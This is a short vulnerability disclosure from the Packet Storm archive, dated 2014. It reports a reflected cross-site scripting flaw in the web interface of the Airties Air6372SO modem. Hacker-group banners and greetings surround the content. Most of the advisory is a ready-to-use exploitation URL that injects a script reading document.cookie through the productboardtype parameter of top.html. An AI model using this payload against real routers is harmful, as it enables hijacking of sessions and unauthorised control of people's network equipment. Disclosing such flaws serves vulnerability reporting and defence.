Airties Air6372SO Modem Web Interface Cross Site Scripting

2014-09-09T00:00:00
ID PACKETSTORM:128213
Type packetstorm
Reporter KnocKout
Modified 2014-09-09T00:00:00

Description

                                        
                                            `Airties Air6372SO Modem Web Interface XSS/Iframe Injection Vulnerability  
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
[+] Author : KnocKout  
[~] Contact : knockout@e-mail.com.tr  
[~] HomePage : http://cyber-warrior.Org - http://h4x0resec.blogspot.com  
[~] Greetz: DaiMon,furty,BackDoor,EthicalHacker,BARCOD3,SZE©,VolqaN,Septemb0x, Unuttuklarýmýz affola..  
############################################################  
Turkey Security Group  
'h4x0re SECURITY'   
###########################################################  
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
|~Hardware/Web App : Airties  
|~Affected Version : Air6372SO  
|~Official Web: http://www.airties.com  
|~RISK : Light  
|~Tested On : Kali Linux \ Windows XP \ Windows Vista \ Airties Air6372SO Modem Web Interface  
####################INFO################################  
interface can be easily operated without root login.  
  
Exploitation;  
==============================================================================  
http://$MODEMROOT/top.html?productboardtype= ?  
  
http://192.168.2.1/top.html?productboardtype=<b>H4x0reSec</b> <script>alert(document.cookie)</script>  
==============================================================================  
  
.__ _____ _______   
| |__ / | |___ __\ _ \_______ ____   
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \   
| Y \/ ^ /> <\ \_/ \ | \/\ ___/   
|___| /\____ |/__/\_ \\_____ /__| \___ >  
\/ |__| \/ \/ \/   
_____________________________   
/ _____/\_ _____/\_ ___ \   
\_____ \ | __)_ / \ \/   
/ \ | \\ \____  
/_______ //_______ / \______ /  
\/ \/ \/   
`